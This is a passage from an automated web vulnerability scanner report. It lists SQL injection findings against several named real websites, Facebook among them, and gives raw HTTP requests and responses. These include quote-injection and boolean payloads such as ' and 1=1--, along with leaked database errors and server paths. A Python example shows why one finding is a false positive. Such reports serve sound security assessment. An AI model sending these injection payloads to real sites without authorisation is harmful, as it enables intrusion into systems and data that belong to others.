Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:38 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /referrer-information.htm?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:39 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.24. http://www.baysideeyes.com.au/sitemap.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /sitemap.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /sitemap.htm' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:37 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''sitemap.htm'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /sitemap.htm'' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:38 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.25. http://www.baysideeyes.com.au/sitemap.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /sitemap.htm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /sitemap.htm?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:25 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /sitemap.htm?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:27 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.26. http://www.facebook.com/search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Automated difference-based tests for SQL injection are unreliable and prone to false positives, and this item shows why. Both responses are marked "redirected" and both are the logged-out login page (body class UIPage_LoggedOut), so the request was redirected before any search ran. The visible differences are the per-request lsd token (UUBNY against Qj720, set in a cookie and echoed in a hidden form field), the order of the stylesheet links and the resulting Content-Length (15579 against 15411); none of these depends on the payload. This is most likely a false positive; retest manually with a stable baseline and review the full responses before treating it as a vulnerability.

Request 1

GET /search/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=UUBNY; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 22:39:35 GMT
Content-Length: 15579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yL/r/u8Bue217GRs.css" />
<link type="text/css" rel="stylesheet" href="http://d.static.ak.fbcdn.net/rsrc.php/y3/r/qFXzV0xbJP2.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"><div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" name="lsd" value="UUBNY" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="en_US" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td cl
...[SNIP]...

Request 2

GET /search/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Qj720; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 22:39:36 GMT
Content-Length: 15411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yL/r/u8Bue217GRs.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"><div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" name="lsd" value="Qj720" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="en_US" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="
...[SNIP]...
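
Why the two responses above differ without any SQL being involved, as an added example that is not part of the report: constructed, heavily abbreviated stand-ins for the two logged-out pages (same layout, the lsd values and stylesheet hrefs copied from the snippets above) are compared naively and then after stripping the per-request token and treating the stylesheet links as an unordered set. A second constructed pair acts as a positive control, a page whose content genuinely changes between the true and false conditions, to show the normalised comparison still reports real differences. The normalisation rules and the 0.98 similarity threshold are my choices, not anything the scanner uses.

```python
import re
from difflib import SequenceMatcher

# Constructed, abbreviated stand-ins for the two responses (not the real
# 15 KB bodies): identical page, different lsd token, stylesheet tags in a
# different order. Hrefs and token values are taken from the snippets above.
RESP_TRUE = """<html><head>
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yL/r/u8Bue217GRs.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />
</head><body class="UIPage_LoggedOut">
<form method="POST" action="https://www.facebook.com/login.php?login_attempt=1">
<input type="hidden" name="lsd" value="UUBNY" autocomplete="off" />
</form></body></html>"""

RESP_FALSE = """<html><head>
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yL/r/u8Bue217GRs.css" />
</head><body class="UIPage_LoggedOut">
<form method="POST" action="https://www.facebook.com/login.php?login_attempt=1">
<input type="hidden" name="lsd" value="Qj720" autocomplete="off" />
</form></body></html>"""

# Positive control (constructed): what a real boolean-based injection looks
# like, the 1=1 page lists rows and the 1=2 page lists none.
RESP_ROWS = "<html><body><ul><li>team calendar</li><li>task list</li></ul></body></html>"
RESP_NOROWS = "<html><body><p>No results found.</p></body></html>"

# Volatile parts: the anti-CSRF token value and the stylesheet link tags.
TOKEN_RE = re.compile(r'(name="lsd"\s+value=")[^"]*(")')
LINK_RE = re.compile(r'<link\b[^>]*\brel="stylesheet"[^>]*/?>\s*')


def normalise(body):
    """Return (body with volatile parts removed, set of stylesheet hrefs).
    The links are compared as a set so reordering does not count as change."""
    links = frozenset(
        href
        for tag in LINK_RE.findall(body)
        for href in re.findall(r'href="([^"]+)"', tag)
    )
    stripped = LINK_RE.sub("", body)
    stripped = TOKEN_RE.sub(r"\1\2", stripped)
    return stripped, links


def naive_differs(a, b):
    """What a byte-for-byte (or Content-Length) comparison concludes."""
    return a != b


def similarity(a, b):
    """Ratio in [0, 1] of how much of the two normalised bodies is shared."""
    return SequenceMatcher(None, a, b).ratio()


def normalised_differs(a, b, threshold=0.98):
    """True only if the pages differ after discarding per-request noise."""
    body_a, links_a = normalise(a)
    body_b, links_b = normalise(b)
    if links_a != links_b:
        return True
    return similarity(body_a, body_b) < threshold


if __name__ == "__main__":
    print("login pages, naive:     ", naive_differs(RESP_TRUE, RESP_FALSE))
    print("login pages, normalised:", normalised_differs(RESP_TRUE, RESP_FALSE))
    print("control pair, normalised:", normalised_differs(RESP_ROWS, RESP_NOROWS))
```

The naive comparison says the login pages differ, the normalised one does not, and the control pair still differs; a verdict of "different responses" is only meaningful after the per-request noise has been identified and removed, which is the manual review the report asks for.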

1.27. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /terms/team-calendar/calendar.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL. The evidence here is a PHP warning rather than a MySQL error string: mysql_fetch_array() was called on something that is not a valid result resource, which is what happens when the preceding mysql_query() fails on the broken statement, returns false, and the script carries on regardless. The warning also discloses the script's filesystem path (/home/freedownloadscenter.com/htdocs/livehandler.php3) and line number. Note that the double-quote control request came back 200 with an empty body (Content-Length: 0), so "the error disappeared" here means the page produced nothing at all; compare both against the response for the unmodified path before treating this as confirmed.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /terms'/team-calendar/calendar.html HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 376
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br />
<br />
<b>Wa
...[SNIP]...

Request 2

GET /terms''/team-calendar/calendar.html HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
Keep-Alive: timeout=15, max=500


1.28. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /terms/team-calendar/calendar.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /terms/team-calendar'/calendar.html HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 376
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br />
<br />
<b>Wa
...[SNIP]...

Request 2

GET /terms/team-calendar''/calendar.html HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
Keep-Alive: timeout=15, max=500


1.29. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /terms/team-calendar/calendar.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /terms/team-calendar/calendar.html' HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:08 GMT
Content-Type: text/html
Connection: close
Content-Length: 376
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br />
<br />
<b>Wa
...[SNIP]...

Request 2

GET /terms/team-calendar/calendar.html'' HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:09 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
Keep-Alive: timeout=15, max=500


1.30. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /terms/team-calendar/calendar.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /terms/team-calendar/calendar.html?1'=1 HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:06 GMT
Content-Type: text/html
Connection: close
Content-Length: 376
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br />
<br />
<b>Wa
...[SNIP]...

Request 2

GET /terms/team-calendar/calendar.html?1''=1 HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 22:05:06 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
Keep-Alive: timeout=15, max=500


1.31. http://www.linkatopia.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Here the "error" is the application's own text, "Update referer failed", not a DBMS message, so the database type cannot be determined from it; the quote-sensitive failure that '' reverses is nevertheless consistent with the Referer value being written unescaped into an UPDATE statement by a visitor-tracking routine, which is why the finding is graded Tentative rather than Certain.

Request 1

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fgemhac8fj8cg4vu6sp9l0k041; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 21
Connection: close
Content-Type: text/html

Update referer failed

Request 2

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=aq32ki9rka3pck407dp563kg41; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.32. http://www.linkatopia.com/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=47l1f14gsf3aq2ifi25sve5r66; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html

Update user agent failed

Request 2

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
